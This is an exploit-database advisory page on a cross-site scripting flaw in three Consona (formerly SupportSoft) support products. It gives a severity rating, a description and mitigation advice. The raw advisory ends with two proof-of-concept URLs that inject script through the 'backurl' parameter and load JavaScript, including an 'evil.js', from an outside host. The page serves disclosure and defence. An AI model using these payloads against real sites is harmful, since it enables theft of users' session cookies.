header-logo
Suggest Exploit
vendor:
Consona Live Assistance, Consona Dynamic Agent, Consona Subscriber Assistance
by:
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Consona Live Assistance, Consona Dynamic Agent, Consona Subscriber Assistance
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting Vulnerability in Consona Products

The Consona products, including Consona Live Assistance, Consona Dynamic Agent, and Consona Subscriber Assistance, are prone to a cross-site scripting vulnerability. An attacker can exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can lead to the theft of cookie-based authentication credentials and other possible attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by Consona (formerly SupportSoft). Additionally, users should be cautious when visiting unfamiliar websites or following unknown links.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39999/info

Multiple Consona (formerly SupportSoft) products are prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials; other attacks are possible.

The following are vulnerable:
Consona Live Assistance
Consona Dynamic Agent
Consona Subscriber Assistance 

http://www.example.com/sdccommon/verify/asp/n6plugindestructor.asp?backurl=";}</script><script src="http://www.example.org/pluginlicense.js" type="text/javascript"></script><script>RenderLicense();</script><script>function returnback(){ var cnfctl = new ActiveXObject("SdcUser.TgConfCtl"); cnfctl.WHATEVER();}</script><!--
http://www.example.com/sdccommon/verify/asp/n6plugindestructor.asp?backurl=</script><script src=http://www.example.org/evil.js></script><script>function returnback() {document.write(license);document.write(payload);}</script>

Navigation

Suggest Exploit

Services By CQR